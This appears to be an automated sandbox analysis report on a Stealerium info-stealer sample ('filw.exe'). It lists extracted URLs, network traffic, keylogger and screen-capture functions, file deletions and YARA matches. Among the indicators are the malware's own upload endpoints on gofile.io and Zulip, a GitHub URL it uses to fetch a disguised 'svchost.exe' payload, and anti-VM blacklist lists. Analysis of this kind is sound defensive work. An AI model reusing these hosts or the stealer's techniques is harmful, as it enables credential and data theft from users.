Source: filw.exe, 00000000.00000002.2003583949.0000019D2B310000.00000004.08000000.00040000.00000000.sdmp, filw.exe, 00000000.00000002.1993398707.0000019D12AFA000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.2005115328.0000019D2B820000.00000004.08000000.00040000.00000000.sdmp, filw.exe, 00000000.00000002.2004445944.0000019D2B760000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/dotnet/runtime
Source: filw.exe, 00000000.00000002.1993398707.0000019D12AFA000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.2004445944.0000019D2B760000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/dotnet/runtime8
Source: filw.exe, 00000000.00000002.1999733605.0000019D22A2D000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.2005243574.0000019D2B860000.00000004.08000000.00040000.00000000.sdmp, filw.exe, 00000000.00000002.1999733605.0000019D229DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/icsharpcode/SharpZipLib
Source: filw.exe	String found in binary or memory: https://github.com/kgnfth
Source: filw.exe, 00000000.00000002.1993398707.0000019D12A49000.00000004.00000800.00020000.00000000.sdmp, Stealerium-Latest.log.0.dr	String found in binary or memory: https://gofile.io/d/mSuAno
Source: filw.exe, 00000000.00000002.1993398707.0000019D12762000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.1993398707.0000019D125B7000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.1993398707.0000019D124EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/d/mSuAno)
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://i.y.qq.com/n2/m/index.html
Source: 2cc80dabc69f58b6_1.16.dr	String found in binary or memory: https://img-s-msn-com.akamaized.net/
Source: 2cc80dabc69f58b6_1.16.dr	String found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://m.kugou.com/
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://m.soundcloud.com/
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://m.vk.com/
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
Source: Cookies.17.dr	String found in binary or memory: https://msn.comXID/
Source: Cookies.17.dr	String found in binary or memory: https://msn.comXIDv10
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://music.amazon.com
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://music.apple.com
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://music.yandex.com
Source: 2cc80dabc69f58b6_1.16.dr	String found in binary or memory: https://ntp.msn.cn/edge/ntp
Source: 000003.log6.16.dr, 2cc80dabc69f58b6_0.16.dr	String found in binary or memory: https://ntp.msn.com
Source: 000003.log0.16.dr	String found in binary or memory: https://ntp.msn.com/
Source: 000003.log0.16.dr	String found in binary or memory: https://ntp.msn.com/0
Source: QuotaManager.16.dr	String found in binary or memory: https://ntp.msn.com/_default
Source: 2cc80dabc69f58b6_1.16.dr, 000003.log0.16.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp
Source: 000003.log0.16.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
Source: Session_13383509666033132.16.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
Source: QuotaManager.16.dr	String found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
Source: 2cc80dabc69f58b6_0.16.dr	String found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://open.spotify.com
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://outlook.live.com/mail/0/
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://outlook.office.com/mail/0/
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
Source: chromecache_600.8.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_605.8.dr	String found in binary or memory: https://plus.google.com
Source: chromecache_605.8.dr	String found in binary or memory: https://plus.googleapis.com
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
Source: filw.exe	String found in binary or memory: https://raw.-githubusercontent.com/
Source: filw.exe, 00000000.00000002.1993398707.0000019D12421000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.1993398707.0000019D125B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com
Source: filw.exe	String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/
Source: filw.exe	String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/MachineGuid.txt
Source: filw.exe	String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/gpu_list.txt
Source: filw.exe	String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txt
Source: filw.exe	String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_name_list.txt
Source: filw.exe	String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_username_list.txt
Source: filw.exe	String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/processes_list.txt
Source: filw.exe, 00000000.00000002.2003770022.0000019D2B370000.00000004.00000020.00020000.00000000.sdmp, filw.exe, 00000000.00000002.1999733605.0000019D22A2D000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.1999733605.0000019D224DD000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.2003770022.0000019D2B3F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/icsharpcode/SharpZipLib/33f64eb0f28cdd2b084cb822fcc224c7c5aba553/
Source: filw.exe, 00000000.00000002.1993398707.0000019D12552000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.1993398707.0000019D12421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/kgnfth/tumblr/refs/heads/main/svchost.exe
Source: filw.exe, 00000000.00000002.1993398707.0000019D125B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/kgnfth/tumblr/refs/heads/main/svchost.exe8
Source: filw.exe, 00000000.00000002.1993398707.0000019D125B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/kgnfth/tumblr/refs/heads/main/svchost.exep
Source: 2cc80dabc69f58b6_1.16.dr	String found in binary or memory: https://sb.scorecardresearch.com/
Source: 2cc80dabc69f58b6_1.16.dr	String found in binary or memory: https://srtb.msn.cn/
Source: 2cc80dabc69f58b6_1.16.dr	String found in binary or memory: https://srtb.msn.com/
Source: filw.exe, 00000000.00000002.1993398707.0000019D1299E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store-eu-par-1.gof
Source: filw.exe, 00000000.00000002.1993398707.0000019D1299E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store-eu-par-1.gofile.io
Source: filw.exe, 00000000.00000002.1993398707.0000019D12552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store-eu-par-1.gofile.io.
Source: filw.exe, 00000000.00000002.1993398707.0000019D1299E000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.1993398707.0000019D12552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store-eu-par-1.gofile.io/uploadfile
Source: tmpB736.tmp.dat.0.dr	String found in binary or memory: https://support.mozilla.org
Source: tmpB736.tmp.dat.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: tmpB736.tmp.dat.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: tmp94D5.tmp.dat.0.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: tmp94D5.tmp.dat.0.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: tmp94D5.tmp.dat.0.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: tmp94D5.tmp.dat.0.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: filw.exe, 00000000.00000002.1993398707.0000019D12781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://szurubooru.zulipchat.com
Source: filw.exe, 00000000.00000002.1993398707.0000019D12781000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.1993398707.0000019D12421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://szurubooru.zulipchat.com/api/v1/messages
Source: filw.exe	String found in binary or memory: https://t.me/Stealeriumm
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://tidal.com/
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://twitter.com/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.16.dr	String found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.16.dr	String found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.16.dr	String found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://vibe.naver.com/today
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://web.telegram.org/
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://web.whatsapp.com
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://word.new?from=EdgeM365Shoreline
Source: chromecache_605.8.dr	String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://www.deezer.com/
Source: tmp9493.tmp.dat.0.dr, tmp94C3.tmp.dat.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: content.js.16.dr, content_new.js.16.dr	String found in binary or memory: https://www.google.com/chrome
Source: Web Data.16.dr, tmp9493.tmp.dat.0.dr, tmp94C3.tmp.dat.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 30658114-af5e-4b61-bd0d-1b38c5b04174.tmp.17.dr	String found in binary or memory: https://www.googleapis.com
Source: chromecache_605.8.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_605.8.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chromecache_600.8.dr	String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_600.8.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_600.8.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://www.iheart.com/podcast/
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://www.instagram.com
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://www.last.fm/
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://www.messenger.com
Source: tmpB736.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org
Source: tmpB736.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: tmpB736.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: History.txt.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: filw.exe, 00000000.00000002.1999733605.0000019D224FD000.00000004.00000800.00020000.00000000.sdmp, tmp2EEF.tmp.dat.0.dr, tmpB736.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: tmpB736.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: filw.exe, 00000000.00000002.1999733605.0000019D224FD000.00000004.00000800.00020000.00000000.sdmp, tmp2EEF.tmp.dat.0.dr, tmpB736.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 2cc80dabc69f58b6_1.16.dr	String found in binary or memory: https://www.msn.com/web-notification-icon-light.png
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
Source: filw.exe, 00000000.00000002.2003165019.0000019D2B130000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/json
Source: filw.exe, 00000000.00000002.2003165019.0000019D2B130000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: filw.exe, 00000000.00000002.2003165019.0000019D2B130000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://www.office.com
Source: Top Sites.16.dr	String found in binary or memory: https://www.office.com/
Source: Top Sites.16.dr	String found in binary or memory: https://www.office.com/Office
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://www.tiktok.com/
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://www.youtube.com
Source: f0b09241-8232-4559-9c5f-fe8dc68fe6df.tmp.16.dr	String found in binary or memory: https://y.music.163.com/m/

Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748

Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.112.123.126:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.112.123.226:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.225.37.215:443 -> 192.168.2.4:49860 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: filw.exe, DesktopScreenshot.cs

.Net Code: Make

Contains functionality to log keystrokes (.Net Source)

Source: filw.exe, Keylogger.cs	.Net Code: SetHook
Source: filw.exe, Keylogger.cs	.Net Code: KeyboardLayout

Source: C:\Users\user\Desktop\filw.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\filw.exe	File deleted: C:\Users\user\AppData\Local\6cb9ab6037d3b35610fdf4df320f3b9a\user@088753_en-CH\Grabber\DRIVE-C\Users\user\Desktop\WUTJSCBCFX.png	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	File deleted: C:\Users\user\AppData\Local\6cb9ab6037d3b35610fdf4df320f3b9a\user@088753_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\KZWFNRXYKI.jpg	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	File deleted: C:\Users\user\AppData\Local\6cb9ab6037d3b35610fdf4df320f3b9a\user@088753_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	File deleted: C:\Users\user\AppData\Local\6cb9ab6037d3b35610fdf4df320f3b9a\user@088753_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU.docx	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	File deleted: C:\Users\user\AppData\Local\6cb9ab6037d3b35610fdf4df320f3b9a\user@088753_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LTKMYBSEYZ.jpg	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: filw.exe, type: SAMPLE	Matched rule: Detects Stealerium based on specific strings Author: Sekoia.io
Source: filw.exe, type: SAMPLE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.0.filw.exe.19d101d0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Stealerium based on specific strings Author: Sekoia.io
Source: 0.0.filw.exe.19d101d0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000000.00000002.1993398707.0000019D12504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
